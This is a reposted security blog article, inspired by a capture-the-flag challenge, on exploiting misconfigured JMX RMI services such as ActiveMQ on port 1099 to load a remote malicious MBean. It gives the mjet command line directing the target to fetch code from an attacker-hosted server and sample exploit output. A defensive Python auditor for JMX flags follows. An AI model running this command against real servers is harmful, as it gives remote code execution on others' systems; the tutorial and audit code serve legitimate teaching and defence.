IMCAFS

Posted by millikan at 2020-02-25

16 Apr 2015 - Demon

[+] Author: Demon
[+] Team: n0tr00t security team
[+] From: http://www.n0tr00t.com
[+] Create: 2015-04-16

Exploitation method

View: Exploiting JMX RMI

I wrote this article because one of the final challenges of ALICTF, a Linux penetration challenge by @cnbird, involved a machine with port 1099 open. After the competition, many participants said they were interested in this exploitation technique, so I have written it up for later reference.

The service originally listening on port 1099 is Apache ActiveMQ's JMX support. Because of improper configuration, an attacker can use the getMBeansFromURL method of javax.management.loading.MLet to load a remote malicious MBean through this port, which means arbitrary code can be executed remotely. This JMX technique applies not only to ActiveMQ but also to many other services that support JMX.

The original article describes the analysis of the vulnerability and the writing of the exploit in detail, so they are not repeated here. How can this vulnerability be used to run a Meterpreter payload from Metasploit directly? A JMX exploitation tool called mjet already exists and can be found by searching GitHub; its instructions are very detailed. First, set up Metasploit on a machine with a public IP and start the Java MLet server module, so that the target machine can load the malicious code. Then run mjet.jar against the target. The specific command is as follows:

java -jar mjet.jar -t target_ip -p 1099 -u http://attacker_ip:8080/mlet/

attacker_ip is the IP of the public-facing machine on which Metasploit is installed. After execution, the following information is returned if the exploit succeeds.

---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

The execution process is clear at a glance. On the Java MLet server side, a Meterpreter session then connects back.

Defense plan
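
A defender-side check for the improper configuration described above, as an added example that is not part of the original article or of mjet: it audits JVM command lines for the standard JDK JMX agent properties. Assumptions: the misconfiguration is a remote agent with authentication or TLS switched off through those properties, the sample command lines are constructed, and a connector opened by the application's own configuration is out of scope.

```python
import re
import shlex

PREFIX = "com.sun.management.jmxremote"
ARG = re.compile(r"-D" + re.escape(PREFIX) + r"((?:\.[\w.]+)?)(?:=(.*))?")

def jmx_properties(cmdline):
    """Collect the JDK JMX agent properties from one JVM command line."""
    props = {}
    for arg in shlex.split(cmdline):
        m = ARG.fullmatch(arg)
        if m:
            # A repeated -D overrides the earlier one, as in the JVM.
            props[m.group(1).lstrip(".")] = (m.group(2) or "").strip().lower()
    return props

def audit_jmx(cmdline):
    """Return (code, message) findings for a remotely reachable JMX agent."""
    props = jmx_properties(cmdline)
    port = props.get("port")
    if not port:
        return []  # the JDK agent opens no remote connector without a port
    findings = []
    # Both settings default to "true" in the JDK; only an explicit "false" weakens them.
    if props.get("authenticate", "true") == "false":
        findings.append(("NO_AUTH", f"port {port}: any client can register and invoke MBeans"))
    if props.get("ssl", "true") == "false":
        findings.append(("NO_TLS", f"port {port}: JMX traffic and credentials are sent in clear text"))
    return findings

# Constructed sample command lines, not taken from the article.
SAMPLES = {
    "broker-a": "java -Dcom.sun.management.jmxremote.port=1099 "
                "-Dcom.sun.management.jmxremote.authenticate=false "
                "-Dcom.sun.management.jmxremote.ssl=false -jar broker.jar",
    "broker-b": "java -Dcom.sun.management.jmxremote.port=1099 "
                "-Dcom.sun.management.jmxremote.ssl=false -jar broker.jar",
    "worker-c": "java -Xmx512m -jar worker.jar",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        for code, msg in audit_jmx(cmd) or [("OK", "no weak JMX agent setting found")]:
            print(f"{name}: {code} {msg}")
```

A NO_AUTH finding is the condition under which a remote client can create the MLet bean and call getMBeansFromURL as shown in the mjet output; port 1099 should also be filtered so that only management hosts can reach it.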

Reference resources